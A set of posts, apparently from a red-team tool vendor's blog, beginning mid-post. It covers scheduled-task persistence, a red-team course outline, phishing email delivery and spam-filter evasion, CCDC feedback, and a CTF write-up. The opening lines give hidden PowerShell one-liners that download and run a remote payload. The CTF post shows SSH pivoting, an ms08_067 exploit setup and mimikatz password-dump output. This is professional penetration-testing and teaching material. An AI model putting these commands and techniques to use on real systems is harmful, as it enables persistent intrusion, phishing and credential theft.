schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6''))'" /sc onstart /ru System

#(X64) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6''))'" /sc onidle /i 30

Each of these one liners assumes a 32-bit PAYLOAD.

I’m not a PowerShell developer, so the hardest part of this exercise for me was the quoting. I’ve never seen anything quite like PowerShell’s convention for escaping quotes. PowerShell includes an option to evaluate a Base64-encoded one liner. I tried to go this route, but I hit the character limit for the task I could schedule.
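For reference, here is roughly how the Base64 route works (a sketch; the encoded string ends up much longer than the plain command, which is why it ran into the length limit):

$cmd = "IEX ((new-object net.webclient).downloadstring('http://192.168.95.195:8080/kBBldxiub6'))"
$enc = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($cmd))
powershell.exe -WindowStyle hidden -ep bypass -nop -EncodedCommand $enc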

One interesting note–you may schedule a task for the user idle event as a non-privileged user. If you need to survive a reboot on a system that you can’t escalate on, this is an option. If you test this option–beware that Windows checks if the user is idle once every fifteen minutes or so. If you schedule an onidle event for 1 minute, don’t expect to see a session one minute later.

Tradecraft – Red Team Operations Course and Notes

October 18, 2013

A few days ago, I posted the YouTube playlist on Twitter and it’s made a few rounds. That’s great. This blog post properly introduces the course along with a few notes and references for each segment.

Tradecraft is a new nine-part course that provides the background and skills needed to execute a targeted attack as an external actor with Cobalt Strike. I published this course to help you get the most out of the tools I develop.

If you’d like to jump into the course, it’s on YouTube.

Here are a few notes to explore each topic in the course with more depth.

1. Introduction

The first part of tradecraft introduces the course, the Metasploit Framework, and Cobalt Strike. If you already know Armitage or the Metasploit Framework–you don’t need to watch this segment. The goal of this segment is to provide the base background and vocabulary for Metasploit Framework novices to follow this course.

To learn more about the Metasploit Framework:

Cobalt Strike:

Targeted Attacks and Advanced Persistent Threat:

  • Read Intelligence-Driven Computer Network Defense from Lockheed Martin. The process in this course maps well to the “systematic process to target and engage an adversary” presented in this paper. If you need to exercise controls that detect, deny, disrupt, degrade, or deceive an adversary–I know a product that can help :)
  • Watch Michael Daly’s 2009 USENIX talk, The Advanced Persistent Threat. This talk pre-dates the marketing bonanza over APT actors and their work. This is a common sense discussion of the topic without an agenda. Even though it’s from 2009, the material is spot on.

Advanced Persistent Threat Campaigns

These actors managed to compromise thousands of hosts and steal data from them for years, without detection. Cobalt Strike’s aim is to augment the Metasploit Framework to replicate these types of threats.

2. Basic Exploitation (aka Hacking circa 2003)

Basic Exploitation introduces the Metasploit Framework and how to use it through Cobalt Strike. I cover how to pick a remote exploit, brute force credentials, and pivot through SSH. I call this lecture “hacking circa 2003” because remote memory corruption exploits have little use in an environment with a handle on patch management. Again, if you have strong Metasploit-fu, you may skip this lecture.

A few notes:

  • I dismiss remote memory corruption exploits as a dated vector, but don’t discount the remote attack surface. HD Moore and Val Smith’s Tactical Exploitation is one of the best resources on how to extract information from exposed services. First published in 2007, it’s still relevant. Watch the video and read the paper.
  • I used the Metasploitable 2 Virtual Machine for the Linux demonstrations in this segment.

3. Getting a Foothold

This segment introduces how to execute a targeted attack with Cobalt Strike. We cover client-side attacks, reconnaissance, and crafting an attack package.

To go deeper into this material:

4. Social Engineering

The fourth installment of tradecraft covers how to get an attack package to a user. The use of physical media as an attack vector is explored, as well as watering hole attacks, one-off phishing sites, and spear phishing.

  • Watch Advanced Phishing Tactics by Martin Bos and Eric Milam. This talk puts together a lot of concepts needed for a successful phish. How to harvest addresses, develop a good pretext, and create a phishing site.
  • Advanced Threat actors favor spear phishing as an access vector. I’d point you to one source, but since this concept has such market buzz, there are a lot of whitepapers on this topic. I suggest a Google search and reading something from a source you consider credible.

5. Post Exploitation with Beacon

By this time, you know how to craft and deliver an attack package. Now, it’s time to learn how to set up Beacon and use it for asynchronous and interactive operations.

6. Post Exploitation with Meterpreter

This video digs into interactive post-exploitation with Meterpreter. You will learn how to use Meterpreter, pivot through the target’s browser, escalate privileges, pivot, and use external tools through a pivot.

Privilege Escalation

7. Lateral Movement

This installment covers lateral movement. You’ll learn how to enumerate hosts and systems with built-in Windows commands, steal tokens, interrogate hosts to steal data, and use just Windows commands to compromise a fully-patched system by abusing trust relationships. My technical foundation is very Linux heavy; I wish this lecture existed when I was refreshing my skillset.

Token Stealing and Active Directory Abuse

Recovering Passwords 

Pass the Hash

8. Offense in Depth

This segment dissects the process to get a foothold into the defenses you’ll encounter. You’ll learn how to avoid or get past defenses that prevent message delivery, prevent code execution, and detect or stop command and control.

Email Delivery

Anti-virus Evasion

  • If you like, you may use Cortana to force Armitage or Cobalt Strike to use an AV-safe executable of your choosing. You have the option to select an EXE with Cobalt Strike’s dialogs. This lets you automate generating a new executable for your payload parameters.
  • Also, check out Veil, a framework for generating anti-virus safe executables.
  • Here’s a blog post by funoverip.net on how to modify a client-side exploit to get past an anti-virus product.

Payload Staging

Offense in Depth

9. Operations

This last chapter covers operations. Learn how to collaborate during a red team engagement, manage multiple team servers from one client, and load scripts to help you out.

Labs

The online course does not have dedicated labs per se. I have two sets of labs I run through with this material.

When I’m hired to teach, I bring a Windows enterprise in a box. I have my students conduct several drills to get familiar with the tools. I then drop them into my enterprise environment and assign goals for them to go through.

I also have a DVD with labs that map to the old version of this course. This DVD has two Linux target virtual machines and an attack virtual machine. Nothing beats setting up a Windows environment to play with these concepts, but this DVD isn’t a bad starter. If you see me at a conference, ask for one.

Email Delivery – What Pen Testers Should Know

October 3, 2013

I get a lot of questions about spear phishing. There’s a common myth that it’s easy to phish. Start a local mail server and have your hacking tool relay through it. No thinking required.

Not quite. Email is not as open as it was ten years ago. Several standards exist to improve the security of email delivery and deter message spoofing. Fortunately–these standards are a band-aid at best. They’re not evenly implemented across all networks and with a little knowledge of how the system works–you can avoid triggering these protections.

SMTP

SMTP is the Simple Mail Transfer Protocol. It’s one of the oldest internet protocols still in use. This is the protocol mail servers use to relay email to each other. SMTP runs on port 25.

Each domain that receives email has a mail server designated to receive these messages. A domain owner designates this mail server through an MX or mail exchanger record in its DNS zone file.

Anyone may query a domain’s MX record to find the server that receives email. Here’s how to do it with dig:

# dig +short MX gmail.com
5 gmail-smtp-in.l.google.com.
10 alt1.gmail-smtp-in.l.google.com.
40 alt4.gmail-smtp-in.l.google.com.
30 alt3.gmail-smtp-in.l.google.com.
20 alt2.gmail-smtp-in.l.google.com.

From the query above, we can see that gmail.com accepts mail through these five servers. Anyone in the world may connect to one of these servers on port 25 and attempt to relay a message to a gmail.com user.

The SMTP protocol is easy to work with (S stands for Simple, right?) Here’s what an SMTP exchange looks like:

# telnet 192.168.95.187 25
Trying 192.168.95.187...
Connected to 192.168.95.187.
Escape character is '^]'.
220 mint ESMTP Sendmail 8.14.3/8.14.3/Debian-9.1ubuntu1; Thu, 3 Oct 2013 15:37:30 -0400
     ; (No UCE/UBE) logging access from: [192.168.95.210](FAIL)-[192.168.95.210]
HELO strategiccyber.com
250 mint Hello [192.168.95.210], pleased to meet you
MAIL FROM: <raffi@strategiccyber.com>
250 2.1.0 <raffi@strategiccyber.com>... Sender ok
RCPT TO: <user@mint>
250 2.1.5 <user@mint>... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: "The Dude" <dude@lasvegas>
To: "Lou User" <user@mint>
Subject: Haaaaaay!
This is message content.
.
250 2.0.0 r93JbUN2002491 Message accepted for delivery
QUIT
221 2.0.0 mint closing connection
Connection closed by foreign host.

The HELO and EHLO commands start a conversation with the mail server. The HELO command does nothing beyond starting the conversation. The EHLO command asks the mail server to list its capabilities. This information tells the SMTP client whether or not a feature (such as STARTTLS) is supported.

The MAIL FROM command tells the mail server who sends this message. This is akin to a return address on an envelope. If a mail server encounters an error it will send a non-delivery notice to the sender. This value is not part of the message the user sees.

The RCPT TO command tells the mail server who to deliver the message to. This information does not need to match the email headers themselves. This value is not part of the message the user sees.

DATA tells the mail server that we’re ready to send the message. The mail server will assume that anything after DATA is message content. This message content will contain the headers and encoded content that the user receives. An SMTP client sends a single period to end this part of the conversation.

If all goes right, the mail server will return a message id and state that the message is in the queue. When the user receives our message, here’s what they see:

[Screenshot: the delivered message as the recipient sees it]

Message Content

This blog post focuses on SMTP and I consider a full discussion of email messages and their format out of scope for this post. In short though, a message consists of content and headers.

Headers tell the mail reader who the message is from, who it is to, its subject, and other information. Here are a few typical headers:

From: "Raphael Mudge" <rsmudge@gmail.com>
To: "Scumbag Sales People" <sales@strategiccyber.com>
Subject: Do you do reseller discounts?

SMTP is a plaintext protocol. All email is sent as ASCII text. There are ways to encode binary attachments and rich content messages. For our purposes, message content follows the headers. We can skip the message encoding and specify a message as-is:

Dear Sales Team,
I have a client that wants to buy your software. I will issue a purchase order no 
matter what your reply is. Do you offer reseller discounts?

Thanks

Purchasing Person

Now that you know what a message looks like, I suggest that you open a terminal and try to send yourself a message by hand. Look up your email domain’s SMTP server with the dig command. Use telnet or nc to connect to port 25 of the mail server. Go through the HELO, MAIL FROM, RCPT TO, and DATA steps. Paste in a message. End it with a period on a line by itself and press enter. Wait one minute. Then go check your email.

If your message ends up in your spam folder–read the rest of this post for reasons why.

Who connects to SMTP servers?

Mail servers cater to two types of users.

Mail servers receive connections from systems that want to relay a message to a user in the mail server’s domain. If I run a mail server for foobar.com, I must accept that anyone, anywhere on the internet, may connect to me to relay a message to a foobar.com user.

This last statement is important–Any system on the internet may connect to a mail server to relay a message to one of its users. This system does not have to be a mail server.

The RCPT TO command indicates who the message is for. If the mail server is an open relay it will accept a message for anyone and relay it to their server. Open relays are rare now because spammers abuse(d) them so much. Most likely the mail server is not an open relay. You will need to specify a user in the mail server’s domain when you use RCPT TO.

Mail servers must also cater to authorized users who want to send messages. An authorized user may provide any address for RCPT TO and the mail server will queue it for delivery.

How does one become an authorized user? It depends on the server. Some servers will assume you’re authorized based on the address you connect from. Others will require you to authenticate before they will relay email for you.

Message Rejection

With all of that background out of the way–let’s talk about reasons why a mail server may reject your message. There are quite a few.

The MAIL FROM message indicates who the message is from. If I connect to a mail server and I claim to have a message from one of its users–the mail server will likely reject it. If I am relaying a message to a user on the mail server’s domain, I must claim the message is from a user on another domain.

Some mail servers will reject messages from a system with an internet address that does not resolve to a fully qualified domain name.

If your IP address is associated with an internet blacklist–expect mail servers to reject messages from you. For example, when I try to send a message through a tethered internet connection:

# telnet mta6.am0.yahoodns.net 25
Trying 63.250.192.45...
Connected to mta6.am0.yahoodns.net.
Escape character is '^]'.
553 5.7.1 [BL21] Connections will not be accepted from 97.165.90.119, because the ip
      is in Spamhaus's list; see http://postmaster.yahoo.com/550-bl23.html
Connection closed by foreign host.

Sender Policy Framework

When I connect to a mail server and send the MAIL FROM command–I am claiming the message is from the address I provide. By default, SMTP does not have a way to verify this statement. It takes what I say at face value.

Sender Policy Framework (or SPF) is a standard to verify this statement. To take advantage of SPF, the owner of a domain creates a DNS TXT record that states which hosts may send email for their domain.

When I connect to a mail server and try to relay a message–the mail server has the opportunity to check the SPF record of the domain I claim the message is from in the MAIL FROM command. If an SPF record exists and my IP address is not in the record–the mail server may reject my message. SPF does not verify the message’s From header.

It takes two for SPF to work. The mail server that receives a message must verify the SPF record. The domain owner must create an SPF record as well. Without both of these elements in place, there is no protection.

To look up the SPF record for a domain, use:

# dig +short TXT wordpress.com
"v=spf1 ip4:192.0.80.0/20 ip4:72.232.146.117/32 ip4:76.74.254.15/32 
 ip4:72.233.119.192/26 ip4:66.155.9.88/32 a mx ?all"

DKIM

SPF does not verify message content. DKIM, short for DomainKeys Identified Mail, is the standard that does. DKIM is a mechanism for a mail server to sign a message and its contents so a receiver can verify where the message came from and that it was not altered in transit. The signature is added to the message as a DKIM-Signature header.

The DKIM-Signature header includes the domain the message is signed for. Another mail server may query that domain’s public key (via DNS) and verify that the message originated from that domain.
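
You can see this mechanism for yourself. Pull the DKIM-Signature header from a message in your inbox, note its d= (domain) and s= (selector) values, and query DNS for a TXT record at selector._domainkey.domain. The selector and key below are placeholders:

$ dig +short TXT selector1._domainkey.example.com
"v=DKIM1\; k=rsa\; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ..."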

By itself, DKIM has no teeth. The absence of a DKIM header does not make a message valid or invalid on its own. Large webmail providers, like Google, have made deals with owners of highly phished domains to check for a DKIM signature and mark a message as spam if it’s not present or doesn’t verify. This protection requires tight cooperation between a domain owner and a mail provider.

DMARC

Tight cooperation between all email receivers and senders is not a tractable solution to stop email spoofing. Domain-based Message Authentication, Reporting and Conformance (or DMARC) is a standard that allows a domain owner to signal that they use DKIM and SPF. DMARC also allows a domain owner to advise other mail servers about what they should do when a message fails a check.

To check if a domain uses DMARC, use dig to look up a TXT record for _dmarc.domain.com:

$ dig +short TXT _dmarc.gmail.com
 "v=DMARC1\; p=none\; rua=mailto:mailauth-reports@google.com"

Check if the domain you will send a message from uses DMARC before you phish. Remember, DMARC only works if the mail server that receives the message checks for the record and acts on it.

Much like SPF, DMARC requires a domain owner to opt-in to the protection. If they don’t, there is no protection against spoofing. Likewise, if a mail server does not check for DMARC, SPF, or DKIM there is no protection for the users on that domain either.

Accepted Domains

Without DMARC, SPF, and DKIM it’s difficult to discard a message as a spoof. There’s one exception to this. Your client should have a good handle on which domains they own. They should also have protections in place to prevent an outsider (you) from emailing their users with a message that spoofs their domain.

One mechanism to stop outsiders from spoofing a local user is the Accepted Domains feature in Microsoft Exchange. If you, as an external actor, can spoof your customer’s domain through their own mail server–I would consider this a finding.
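
One way to test this from the outside is to connect to the customer’s mail server and try to relay a message from one of their addresses to another. Here’s a sketch, with client.example standing in for the customer’s domain and the responses shown only as placeholders; a properly configured server should refuse the spoofed sender or refuse to deliver the message:

$ telnet mail.client.example 25
Connected to mail.client.example.
220 mail.client.example ESMTP
HELO myworkstation.example.net
250 mail.client.example
MAIL FROM:<ceo@client.example>
250 2.1.0 Sender OK
RCPT TO:<helpdesk@client.example>
250 2.1.5 Recipient OK

If the spoofed message is accepted and lands in the target user’s inbox, write it up.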

Spam Traps

Let’s say your message gets through the initial checks. It’s still at risk of finding its way to the spam folder. Different mail servers and tools check a lot of factors to decide if a message is spam or dangerous. Here are a few to think about:

  • How old is the domain you’re phishing from? If you send a phish from a domain registered last week–it’s possible a mail server may flag it as spam. Older domains are more trustworthy.
  • Does your message contain a link to an IP address? Sometimes a link to an IP address looks suspicious.
  • Does your message display one URL but link to another? For example–does your message contain a link that looks like this:
    <a href="http://www.yahoo-iphishyou.com">http://www.yahoo.com</a>

    This is suspicious.

  • Pay attention to your attachment. Most mail servers block known executable files (e.g., .exe, .pif, .scr, etc.) out of the box. Suspicious attachments won’t help your spam score.
  • Make sure your message content is not broken. Missing HTML close tags, missing headers, and other errors are potential signs of spam. I prefer to repurpose an existing email message for my phishes. An email client does a better job generating valid messages than a hacking tool ever will.
  • Check that your MAIL FROM address matches the email in the From header in your message. Some webmail providers will flag your message as spam if these values do not match. You may not have the same problem with corporate email infrastructure.

Circumventing Defenses

So far, in this post, I’ve raised your awareness of message delivery, how it works, and what stops it. If you’re planning to spoof a message from another domain:

  • Check if the domain has an SPF, DMARC, or DKIM record. The mail server that receives your phish has to verify these records–but if they don’t exist, there’s nothing for it to verify.
  • Try to send your message to an inbox you control through email infrastructure that is similar to your client’s. For example, many corporations use Outlook and Exchange. Microsoft Outlook has its own junk filter. Email yourself at your corporate address to see how Microsoft’s junk filter processes your message content.
  • Reconnaissance is your friend. Send a message to a non-existent user at the domain you’re trying to send a phish to. Make sure MAIL FROM is an address that you control. If you’re lucky, you will get a non-delivery notice. Inspect the headers from the non-delivery notice to see your spam score, SPF score, and other indicators about your message. If you get a non-delivery notice–it’s likely that your message passed other pre-delivery checks (a local junk filter may still send your message to the spam folder though).

For Cobalt Strike users, here’s how this advice maps to the built-in spear phishing tool:

phishingpractices

If all else fails–go legitimate. There’s no hard requirement that you must phish from a spoofed domain. Try to register a phishing domain that relates to a generic pretext. Create the proper SPF, DKIM, and DMARC records. Use this domain when you need something that looks legitimate. There’s nothing wrong with this approach–so long as your message makes it to the target user and it gets clicks.

Finally, don’t get discouraged when you can’t get a spoofed message to your Gmail account. Large webmail providers are early adopters and consumers of standards such as DKIM, SPF, and DMARC. It’s possible that your corporate pen testing client hasn’t heard of this stuff. Once you complete a successful phishing engagement–you can suggest these things in your report.

h1

Telling the Offensive Story at CCDC

May 30, 2013

The 2013 National CCDC season ended in April. One topic that I’ve sat on since then is feedback. Providing meaningful and specific feedback on a team-by-team basis is not easy. This year, I saw multiple attempts to solve this problem. These initial attempts instrumented the Metasploit Framework to collect as many data points as possible into a central database. I applaud these efforts and I’d like to add a few thoughts to help them mature for the 2014 season.

Instrumentation is good. It provides a lot of data. Data is good, but data is dangerous. Too much data with no interpretation is noise. As there are several efforts to collect data and turn it into information, I’d like to share my wish list of artifacts that I’d like to see students get at the end of a CCDC event.

1) A Timeline

A timeline should capture red team activity as a series of discrete events. Each event should contain:

  • An accurate timestamp
  • A narrative description of the event
  • Information to help positively identify the activity (e.g., the red IP address)
  • The blue asset involved with the event

A complete timeline is valuable as it allows a blue team to review their logs and understand what they can and can’t observe. If they were able to observe the activity but didn’t act on an event, then the team knows they have an operational issue with how they consume and act on their data.

If a team can’t find a red event in their logs, then they have a blind spot and they need to put in place a solution to close this gap.

In a production environment, the blue team has access to their logs on a day-to-day basis. In an exercise, the blue team only has access to the exercise network during the exercise. I recommend that blue teams receive a red team timeline and that they also get time after the competition to export their logs for review during the school year.

These red and blue log artifacts would provide blue teams a great tool to understand, on their own, how they can improve. Access to these artifacts would also allow students to learn log analysis and train throughout the year with real data.

Cobalt Strike’s activity report is a step in this direction. It interprets data from the Metasploit Framework and data collected by Cobalt Strike to create a timeline and capture this information. There are a few important linkages missing though. For example, if a compromised system connects to a stand-alone handler/listener, there is no information to associate that new session with the behavior that led to it (e.g., did someone task a Beacon? did the user click on a client-side attack? etc.).

2) An Asset Report

An asset report describes, on an asset-by-asset basis, how the red team views the asset and what they know about it.

Most penetration testing tools offer this capability. Core Impact, Metasploit Pro, and Cobalt Strike generate reports that capture all known credentials, password hashes, services, vulnerabilities, and compromises on a host-by-host basis.

These reports work and they are a great tool for a blue team to understand which systems are their weakest links.

A challenge with these reports is that a CCDC red team does not use a single system to conduct activity. Some red team members run attack tools locally; others connect to multiple team servers to conduct different aspects of the engagement. Each system has its own view of what happened during the event. I’m taking steps to manage this problem with Cobalt Strike. It’s possible to connect to multiple team servers and export a report that intelligently combines the point of view of each server into one picture.

I saw the value of the asset report at Western Regional CCDC. I spent the 2-3 hour block of networking time going over Cobalt Strike’s hosts report with different blue teams. Everyone wanted me to scroll through their hosts. In the case of the winning team, I didn’t have to say anything. The students looked at their report, drew their conclusions, and thanked me for the helpful feedback. The hosts report gave the blue teams something concrete to judge whether they were too complacent or too paranoid. Better, this information helped them understand how close we were to making things much worse for them.

Whether this type of report comes from a penetration testing tool or the competition-specific solutions under development, I recommend that red teams provide an asset-by-asset report. The students I interacted with were able to digest this information quickly and use it to answer some of their open questions.

3) A Vulnerability Report

During a CCDC event, the red team only uses one or two exploits to get a toehold. We then leverage credentials for the rest of the event. Still, I’m often asked “which exploits did you use?” A report of the vulnerabilities we exploited will answer this question.

4) A Narrative

The item that completes the feedback is the narrative. The narrative is the red team member telling the story of what they did at a very high level. A short narrative goes a long way to bring life to the data the blue team will have to sift through later.

I believe telling stories is something CCDC red teams do well. At a typical CCDC debrief, red team members will share their favorite moments or wins during the event. Without context, this story is anecdotal. Combined with the data above, it’s something actionable. Now the blue teams know what they should look for when they’re analyzing the log files.

The narrative provides blue teams with a starting point to understand what happened. The data we provide them will give them the opportunity to take that understanding to the next level.

5) Sizzle

During a security assessment, I’m not doing my job if I just explain what I did. It’s my job to ally with my blue counterparts and actively sell our client’s leadership on the steps that will improve their security posture. When communicating with non-technical folks, a little sizzle goes a long way. I like to record my screen during an engagement. At the end of the engagement, I cut the interesting events from the recording and create short videos to show the high points. Videos make it easier to understand the red perspective. If a video involves an event that both the red team and blue team experienced together, I find watching the video together creates a sense of a shared experience. This can go a long way towards building rapport (a key ingredient in that alliance-building step).

To record my screen, I use ScreenFlow for Mac OS X. Twenty hours of screen recording (no audio) takes up a few gigabytes, nothing unreasonable.

In this post, I listed five artifacts we can provide blue teams to better tell the offensive story. I’ve pointed at examples where I could. Beware though, if actionable feedback were as easy as clicking a button to generate a report, this blog post wouldn’t exist. Reporting is challenging in an environment where 20 experts are actively participating in 10 engagements with multiple toolkits. As different parties build data collection platforms, I hope to see an equal effort towards data interpretation. These artifacts are some of the things I’d like to see come out of the data. What artifacts do you think would help?

h1

Goading Around Firewalls

May 22, 2013

Last weekend, I was enjoying the HackMiami conference in beautiful Miami Beach, FL. On Sunday, they hosted several hacking challenges in their CTF room. One of the sponsoring vendors, a maker of network security appliances, set up a challenge too. The vendor placed an unpatched Windows XP device behind one of their unified threat management devices. The rules were simple: they would allow all traffic inbound and outbound, through a NAT, with their intrusion prevention technology turned on. They were looking for a challenger who could exploit the Windows XP system and get positive command and control without their system detecting it.

thegame

I first heard about this challenge from an attendee who subjected me to some friendly goading. “You wrote a custom payload, your tools should walk right through it”. Not really. Knowing the scenario, my interest in participating was pretty low. I can launch a known implementation of ms08_067_netapi through an intrusion prevention device, but to what end? I fully expected the device to pick it up and squash my connection. The Metasploit Framework has a few evasion options (type show evasion the next time you configure a module), but I expected limited success with them.

The representatives from the vendor were pretty cool, so I opted to sit down and see what they had. The vendor rep told me the same network also had a Metasploitable Virtual Machine. This immediately made life better. My first act was to try to behave like a legitimate user and see if that worked. If legitimate traffic can’t get through, then there’s little point in trying a hacking tool.

I ran ssh and was able to log in to the Metasploitable Virtual Machine with one of its known weak accounts. Funny enough, this was a painful act. One person thought they could get past the device by attempting a Denial of Service, hoping to make it fail open. Another person wanted to further everyone’s learning and decided to ARP poison the network. Narrowing down these hostile factors took some time away from the fun.

A static ARP entry later and I was ready to try the challenge again. I’ve written about tunneling attacks through SSH before, but the technique is so useful, I can’t emphasize it enough.

First, I connected to the Metasploitable Linux system using the ssh command. The -D flag followed by a port number allows me to specify which port to set up a local SOCKS proxy server on. Any traffic sent through this local SOCKS proxy will tunnel through the SSH connection and come out through the SSH host.

ssh -D 1080 user@6.6.6.98

Next, I had to instruct the Metasploit Framework to send its traffic through this SOCKS proxy server. Again, easy enough. I opened a Metasploit Framework console tab and typed:

setg Proxies socks4:127.0.0.1:1080

The setg command globally sets an option in the Metasploit Framework. This is useful for Armitage and Cobalt Strike users. With setg, I can set this option once, and modules I launch will use it.

Finally, I had to find my target. The vendor had setup a private network with the target systems. I typed ifconfig on the Metasploitable system to learn about its configuration. I then ran auxiliary/scanner/smb/smb_version against the private network Metasploitable was on.

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set THREADS 24
THREADS => 24
msf auxiliary(smb_version) > set SMBDomain WORKGROUP
SMBDomain => WORKGROUP
msf auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(smb_version) > run -j
[*] Auxiliary module running as background job
[*] Scanned 049 of 256 hosts (019% complete)
[*] Scanned 062 of 256 hosts (024% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] 192.168.1.111:445 is running Windows 7 Professional 7601 Service Pack (Build 1) (language: Unknown) (name:FGT-XXXX) (domain:WORKGROUP)
[*] 192.168.1.113:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] 192.168.1.112:445 is running Windows XP Service Pack 3 (language: English) (name:XXXX-44229FB) (domain:WORKGROUP)
[*] Scanned 119 of 256 hosts (046% complete)
[*] Scanned 143 of 256 hosts (055% complete)
[*] Scanned 164 of 256 hosts (064% complete)
[*] Scanned 191 of 256 hosts (074% complete)
[*] Scanned 215 of 256 hosts (083% complete)
[*] Scanned 239 of 256 hosts (093% complete)
[*] Scanned 256 of 256 hosts (100% complete)

Once I discovered the IP address of the Windows XP system, I was able to launch exploit/windows/smb/ms08_067_netapi through my SSH proxy pivot. This, in effect, resulted in the exploit coming from the Metasploitable system on the same private network as the Windows XP target. I used a bind payload to make sure Meterpreter traffic would go through the SSH proxy pivot as well.
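
For reference, here’s a minimal sketch of how the module could be configured through that SOCKS pivot (the target address comes from the scan output above; the payload and port are assumptions on my part):

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.112
RHOST => 192.168.1.112
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) > exploit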

tunneling

At this point, I had access to the Windows XP system and I was able to take a picture of the vendor with his webcam and use mimikatz to recover the local password. Still undetected.

meterpreter > use mimikatz
Loading extension mimikatz...success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
[*] wdigest credentials
===================

AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;999    NTLM       WORKGROUP        XXXX-44229FB$
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE
0;54600  NTLM
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE
0;62911  NTLM       XXXX-44229FB     Administrator     password123!

There’s a lesson here. Don’t attack defenses, go around them.
